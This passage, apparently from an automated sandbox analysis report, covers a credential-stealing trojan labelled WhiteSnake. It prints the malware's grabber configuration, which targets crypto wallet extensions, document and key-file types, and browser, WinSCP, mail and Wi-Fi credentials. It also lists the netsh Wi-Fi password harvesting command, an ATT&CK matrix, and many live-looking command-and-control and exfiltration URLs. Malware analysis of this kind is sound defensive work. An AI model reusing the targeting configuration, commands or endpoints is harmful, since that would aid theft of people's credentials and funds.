name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdfjmmkpcnlpebklmnkoeoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\73ybGtnYXx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR
          Source: Yara matchFile source: 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 73ybGtnYXx.exe PID: 4296, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          11
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API
          Boot or Logon Initialization Scripts11
          Process Injection
          2
          Obfuscated Files or Information
          1
          Credentials in Registry
          24
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Timestomp
          Security Account Manager221
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          21
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput Capture11
          Non-Standard Port
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets151
          Virtualization/Sandbox Evasion
          SSHKeylogging3
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
          Virtualization/Sandbox Evasion
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input Capture4
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
          Process Injection
          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640529 Sample: 73ybGtnYXx.exe Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 36 api.telegram.org 2->36 38 ip-api.com 2->38 40 171.39.242.20.in-addr.arpa 2->40 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 56 10 other signatures 2->56 8 73ybGtnYXx.exe 14 6 2->8         started        signatures3 54 Uses the Telegram API (likely for C&C communication) 36->54 process4 dnsIp5 42 45.82.65.63, 60236, 80 SIRINFO-ASIT United Kingdom 8->42 44 5.196.181.135, 443, 60237 OVHFR France 8->44 46 9 other IPs or domains 8->46 34 C:\Users\user\AppData\...\73ybGtnYXx.exe.log, CSV 8->34 dropped 58 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->58 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->60 62 Tries to steal Mail credentials (via file / registry access) 8->62 64 4 other signatures 8->64 13 cmd.exe 1 8->13         started        16 cmd.exe 1 8->16         started        file6 signatures7 process8 signatures9 66 Uses netsh to modify the Windows network and firewall settings 13->66 68 Tries to harvest and steal WLAN passwords 13->68 18 netsh.exe 2 13->18         started        20 conhost.exe 13->20         started        22 findstr.exe 1 13->22         started        24 chcp.com 1 13->24         started        26 netsh.exe 2 16->26         started        28 conhost.exe 16->28         started        30 findstr.exe 1 16->30         started        32 chcp.com 1 16->32         started        process10

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          73ybGtnYXx.exe59%VirustotalBrowse
          73ybGtnYXx.exe71%ReversingLabsWin32.Trojan.WhiteSnake
          73ybGtnYXx.exe100%AviraHEUR/AGEN.1307453
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://167.99.138.249:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%0%Avira URL Cloudsafe
          http://95.216.147.1790%Avira URL Cloudsafe
          http://206.189.109.146:80/2r1j6_user0%Avira URL Cloudsafe
          https://138.2.92.67:4430%Avira URL Cloudsafe
          https://5.196.181.135:443/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%70%Avira URL Cloudsafe
          http://107.161.20.142:80800%Avira URL Cloudsafe
          https://5.196.181.135:4430%Avira URL Cloudsafe
          http://206.166.251.4:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%70%Avira URL Cloudsafe
          http://185.217.98.121:8080/get/hX8i6V7aqg/2r1j6_user0%Avira URL Cloudsafe
          https://192.99.196.191:4430%Avira URL Cloudsafe
          https://101.126.19.171:4430%Avira URL Cloudsafe
          http://66.42.56.128:800%Avira URL Cloudsafe
          http://194.164.198.113:8080/2r1j6_user0%Avira URL Cloudsafe
          http://8.219.110.16:99990%Avira URL Cloudsafe
          http://45.82.65.630%Avira URL Cloudsafe
          https://5.196.181.135/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://45.82.65.63:80/2r1j6_user0%Avira URL Cloudsafe
          http://129.151.109.160:80800%Avira URL Cloudsafe
          http://95.216.147.179:800%Avira URL Cloudsafe
          https://5.196.181.135:443/2r1j6_user0%Avira URL Cloudsafe
          http://95.216.147.179:80/2r1j6_user0%Avira URL Cloudsafe
          http://46.4.73.118:9000/2r1j6_user0%Avira URL Cloudsafe
          http://159.203.174.113:80900%Avira URL Cloudsafe
          http://95.216.147.179/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://45.82.65.63:80/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://194.164.198.1130%Avira URL Cloudsafe
          http://167.99.138.249:80802(0%Avira URL Cloudsafe
          http://206.189.109.146:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%70%Avira URL Cloudsafe
          http://167.99.138.249:8080/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://45.82.65.63:800%Avira URL Cloudsafe
          https://5.196.181.135:443/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://194.164.198.113:80802(0%Avira URL Cloudsafe
          http://41.87.207.180:90900%Avira URL Cloudsafe
          http://194.164.198.113:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F0%Avira URL Cloudsafe
          https://5.196.181.1350%Avira URL Cloudsafe
          http://45.82.65.63:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%740%Avira URL Cloudsafe
          http://185.217.98.121:800%Avira URL Cloudsafe
          http://206.166.251.4:8080/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://206.189.109.146/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          https://44.228.161.50:4430%Avira URL Cloudsafe
          http://101.43.160.136:80800%Avira URL Cloudsafe
          http://206.166.251.4:80802(0%Avira URL Cloudsafe
          http://47.110.140.182:80800%Avira URL Cloudsafe
          http://185.217.98.121:8080/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://168.138.211.88:80990%Avira URL Cloudsafe
          http://167.99.138.249:80800%Avira URL Cloudsafe
          http://18.228.80.130:800%Avira URL Cloudsafe
          http://167.99.138.249:8080/2r1j6_user0%Avira URL Cloudsafe
          http://167.99.138.2490%Avira URL Cloudsafe
          http://185.217.98.121:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%0%Avira URL Cloudsafe
          http://45.82.65.63/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://185.217.98.121:80800%Avira URL Cloudsafe
          http://185.217.98.121:8080/hX8i6V7aqg/2r1j6_user0%Avira URL Cloudsafe
          http://206.166.251.40%Avira URL Cloudsafe
          http://206.166.251.4:8080/2r1j6_user0%Avira URL Cloudsafe
          http://206.189.109.146:80/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://194.164.198.113:8080/2r1j6_user%40358075_report.wsr0%Avira URL Cloudsafe
          http://206.189.109.1460%Avira URL Cloudsafe
          http://47.96.78.224:80800%Avira URL Cloudsafe
          https://154.9.207.142:4430%Avira URL Cloudsafe
          http://46.4.73.1180%Avira URL Cloudsafe
          http://206.166.251.4:80800%Avira URL Cloudsafe
          http://185.217.98.121:8080/2r1j6_user0%Avira URL Cloudsafe
          http://185.217.98.121:80802(0%Avira URL Cloudsafe
          http://8.134.71.132:80820%Avira URL Cloudsafe
          http://101.126.19.171:800%Avira URL Cloudsafe
          http://194.164.198.113:80800%Avira URL Cloudsafe
          http://95.216.147.179:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%720%Avira URL Cloudsafe
          http://116.202.101.219:80800%Avira URL Cloudsafe
          http://185.217.98.1210%Avira URL Cloudsafe
          http://38.60.191.38:800%Avira URL Cloudsafe
          http://46.4.73.118:9000/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%0%Avira URL Cloudsafe
          https://5.196.181.135/2r1j6_user%40358075_report.wsrp0%Avira URL Cloudsafe
          http://185.217.98.121:8080/get0%Avira URL Cloudsafe
          http://101.132.223.26:80800%Avira URL Cloudsafe
          http://46.4.73.118:90000%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          ip-api.com
          208.95.112.1
          truefalse
            high
            api.telegram.org
            149.154.167.220
            truefalse
              high
              171.39.242.20.in-addr.arpa
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://ip-api.com/line?fields=query,countryfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://95.216.147.17973ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://5.196.181.135:443/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%773ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/ac/?q=73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://138.2.92.67:44373ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://api.telegram.org/bot73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://206.189.109.146:80/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://167.99.138.249:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://107.161.20.142:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://5.196.181.135:44373ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://185.217.98.121:8080/get/hX8i6V7aqg/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://206.166.251.4:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%773ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FD5E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.99.196.191:44373ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://101.126.19.171:44373ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://194.164.198.113:8080/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://66.42.56.128:8073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://45.82.65.6373ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://ip-api.com73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCE2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://45.82.65.63:80/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://8.219.110.16:999973ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://5.196.181.135:443/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://5.196.181.135/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://129.151.109.160:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://95.216.147.179:8073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/soap/encoding/73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://95.216.147.179:80/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://46.4.73.118:9000/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://194.164.198.11373ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.w3.or73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://ip-api.com/line?fields=query73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FCB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://159.203.174.113:809073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B61FCF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://45.82.65.63:80/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://95.216.147.179/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://206.189.109.146:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%773ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://167.99.138.249:8080/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/wsdl/73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B610008000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://167.99.138.249:80802(73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://45.82.65.63:8073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://41.87.207.180:909073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://api.telegram.org73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://gemini.google.com/app?q=73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://5.196.181.135:443/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://206.166.251.4:8080/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://45.82.65.63:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%7473ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://185.217.98.121:8073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://api.telegram.org73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://194.164.198.113:80802(73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://194.164.198.113:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://5.196.181.13573ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://206.189.109.146/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://44.228.161.50:44373ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://101.43.160.136:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://47.110.140.182:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://168.138.211.88:809973ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.google.com/images/branding/product/ico/googleg_alldp.ico73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://185.217.98.121:8080/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://206.166.251.4:80802(73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://18.228.80.130:8073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://167.99.138.24973ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
